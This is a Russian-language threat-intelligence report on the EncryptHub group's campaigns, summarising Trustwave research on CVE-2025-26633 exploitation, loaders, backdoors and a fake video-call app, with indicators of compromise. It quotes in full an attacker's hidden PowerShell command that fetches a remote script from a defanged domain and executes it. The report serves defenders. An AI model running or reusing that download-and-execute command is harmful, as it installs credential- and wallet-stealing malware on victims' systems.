Исследовательская группа Trustwave SpiderLabs опубликовала тревожные данные о развитии тактик хакерского объединения EncryptHub. Группа, также известная как LARVA-208 и Water Gamayun, сочетает социальную инженерию с эксплуатацией уязвимостей и злоупотреблением доверенными платформами, включая службу поддержки браузера Brave. По данным на февраль 2025 года, жертвами группировки стали уже 618 организаций по всему миру.
Описание
Социальная инженерия как основа атак
Атаки начинаются с фишинговых звонков, где злоумышленники выдают себя за сотрудников ИТ-поддержки. Жертвам поступают убедительные запросы в Microsoft Teams, после чего их уговаривают разрешить удаленный доступ к устройствам. Под предлогом "технической помощи" пользователей заставляют запускать PowerShell-команды, открывающие путь для вредоносных инструментов. Этот метод остается высокоэффективным из-за сложности распознавания поддельных сценариев.
Эксплуатация уязвимости CVE-2025-26633
Ключевым элементом последней кампании стало использование уязвимости в Microsoft Management Console (CVE-2025-26633), получившей название MSC EvilTwin. Несмотря на выпуск патча в марте 2025 года, группировка активно атакует незащищенные системы. Механизм основан на подмене .msc-файлов: вредоносный файл с тем же именем, что и легитимный, размещается в каталоге MUIPath (обычно en-US). При запуске настоящего файла процесс mmc.exe ошибочно загружает зловредную версию из-за особенностей поиска библиотек.
Первоначальный скрипт runner.ps1 загружается через команду:
| 1 | powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'hxxps://cjhsbam[.]com/payload/runner.ps1' | Invoke-Expression" |
Он заменяет в .msc-файле плейсхолдер "htmlLoaderUrl" на C2-сервер EncryptHub, после чего внедряется скрипт build.ps1. Этот инструмент шифрует данные AES, собирает системную информацию, обеспечивает постоянство доступа и развертывает Fickle Stealer - PowerShell-инструмент для кражи файлов, данных кошельков криптовалют и системных метрик.
Расширение арсенала: Golang и злоупотребление Brave
Исследователи обнаружили новые инструменты EncryptHub, написанные на Golang. Лоадер SilentCrystal дублирует функциональность PowerShell-скриптов, но использует изощренный прием: создает поддельный каталог "C:\Windows \System32" (с пробелом после "Windows") для обхода систем защиты. Особенность - злоупотребление платформой Brave Support для размещения вредоносных ZIP-архивов. Атакующие, вероятно, получили аккаунт с правами загрузки файлов, что позволило им использовать доверенный домен в качестве CDN для полезной нагрузки.
SilentCrystal взаимодействует с C2 через POST-запросы с "API-ключом", получая легитимные ссылки Brave Support для загрузки зловредов. После замены плейсхолдера {URI} в WF.msc на вредоносный URL, он эксплуатирует CVE-2025-26633 для выполнения кода.
Схожие индикаторы
Ранее PRODAFT Threat Intelligence зафиксировали обращения к C2 серверам, в компании направленной на пользователей Steam.
Скрытые бэкдоры и фейковые сервисы
В арсенале группы также найден SOCKS5-бэкдор на Golang, работающий в двух режимах. В клиентском режиме он подключается к C2, отправляя через Telegram детали системы: имя пользователя, домен, права администратора, IP-адрес и геолокацию. В серверном - развертывает C2-инфраструктуру с самоподписанным TLS-сертификатом ("Common Name: Reverse Socks"), обрабатывая множественные подключения. Для связи используется замаскированный URL: hxxps://safesurf.fastdomain-uoemathhvq.workers[.]dev.
Другой инструмент - фейковая платформа видеосвязи RivaTalk (api.rivatalk[.]net), зарегистрированная в конце июля 2025 года. Для скачивания "десктопного приложения" требуется код доступа, усложняющий анализ. Установочный MSI-файл злоупотребляет бинарником Symantec ELAM для подгрузки вредоносного userenv.dll, который запускает PowerShell-команду для загрузки скрипта pay.ps1. Во время его работы демонстрируется фальшивое окно "System Configuration", а на фоне генерируется трафик к популярным сайтам для маскировки связи с C2.
Выводы: растущая угроза
EncryptHub демонстрирует высокую адаптивность, сочетая психологические манипуляции с техническими ноу-хау. Злоупотребление доверенными сервисами (Brave Support), эксплуатация "свежих" уязвимостей до их массового патчинга и многослойное шифрование делают группу особо опасной.
Данные Trustwave SpiderLabs свидетельствуют: EncryptHub продолжает эволюционировать, делая ставку на скрытность и эксплуатацию человеческого фактора. Без комплексного подхода к безопасности риски для организаций будут только возрастать.
Индикаторы компрометации
IPv4
- 185.33.86.220
Domains
- 0daydreams.net
- cjhsbam.com
- rivatalk.net
- safesurf.fastdomain-uoemathhvq.workers.dev
SHA256
- 082fbf96c546fa58ccb72316a55b2c913ef9f551f7e761c7232a1477c14e6bb6
- 20d813dcfd6b6a44b27a09cf2e780cccab2bfef9c9b1e506424ff240a571e69c
- 3a89c1469067ddedf187145fc168fbc6cce8b754262ddde449c6d72c82ec25aa
- 3ce029e547aae3d8e3a96347c7051bc81b60ec28f077645cbf31a32237a79797
- 3fcd387227dc5d4d49d38d60d80ad3ddf9d33d98f29a8bced1f1141d4ec80fea
- 5635dd2ea74ebc829f1f53777be22ad34bb6a14d7e1e2e90e25268f65aca1220
- 633e0dddb91f5cf83b839505cf19ffa7553b49d6966e39886238bb0875e6b897
- 6cfbf662f1444a8cdec263f311be6c5b73404c14b20e0570ab28b8fc62f7225b
- 6fb7fd9763d6b269793c80bbc03a1be358390781af4b698fba1591cb8dbb8825
- 7fbcc5dfccb73c27b69a055da37c7034336f420f7f09e7f639f0987cda124af8
- 8f1dfb086d11cb1c235d7d6d9889f9d7c34da6f01cf407508b3292e63fe5e034
- a67ab2b0ba110f482b7644c8f327a3242d72ccc6c9f9427bbb01b4c24e3e1a01
- d2a2fc005adf75fa5e7338b2e76053ac44f3aedadc6b31fbec172d8e1c209a11
- eff721dc91044c7ae3e7918627ce1e61aec6ee959e4c9602eebe88150da18eba
